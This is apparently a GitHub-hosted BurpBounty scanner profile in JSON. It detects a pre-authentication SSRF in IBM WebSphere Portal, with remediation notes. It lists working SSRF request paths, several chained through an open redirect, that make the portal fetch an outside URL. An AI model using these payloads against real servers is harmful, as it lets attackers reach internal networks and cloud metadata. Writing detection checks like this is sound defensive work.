-
Notifications
You must be signed in to change notification settings - Fork 0
/
WebSphere_portal_SSRF.bb
81 lines (81 loc) · 3.43 KB
/
WebSphere_portal_SSRF.bb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
[
{
"ProfileName": "WebSphere_portal_SSRF",
"Name": "",
"Enabled": false,
"Scanner": 1,
"Author": "Blaze Information Security",
"Payloads": [
"true,/wps/PA_WCM_Authoring_UI/proxy/http/example.com",
"true,/docpicker/internal_proxy/http/example.com",
"true,/wps/proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout\u0026RedirectTo\u003dhttp://example.com",
"true,/docpicker/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout\u0026RedirectTo\u003dhttp://example.com",
"true,/wps/myproxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout\u0026RedirectTo\u003dhttp://example.com",
"true,/wps/common_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout\u0026RedirectTo\u003dhttp://example.com",
"true,/wps/cmis_proxy/http/www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout\u0026RedirectTo\u003dhttp://example.com",
"true,/wps/contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/?uri\u003dhttp://www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout\u0026RedirectTo\u003dhttp://example.com"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Example Domain"
],
"Tags": [
"All",
"CVEs",
"Vulnerabilities"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": true,
"ResponseCode": "200",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"isHeaderValue": false,
"sequence": false,
"NewHeaders": [],
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"requestType": 1,
"rawRequest": "",
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "WebSphere Portal Pre-Auth SSRF",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "WebSphere Portal contains a pre-authenticated Server-Side Request Forgery (SSRF) vulnerability that may\nallow malicious users to scan the internal network, leak sensitive cloud metadata and more.\n\nThis check is inspired on Assetnote\u0027s original research.",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "There is currently no known patch for this vulnerability.\n\nA general suggestion is to modify all of the proxy-config.xml files in the Websphere Portal installation so that no origins are whitelisted.\n\nAdditionally, if the functionality is not necessary for your installation of Websphere Portal, remove the following folders:\n\nPortalServer/base/wp.proxy.config/installableApps/wp.proxy.config.ear\nWebSphere/wp_profile/installedApps/dockerCell/Quickr_Document_Picker.ear\nWebSphere/wp_profile/config/cells/dockerCell/applications/PA_WCM_Authoring_UI.ear",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
66,
64
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false,
"changeHttpRequest": false,
"showIssue": false,
"changeHttpRequestType": 1
}
]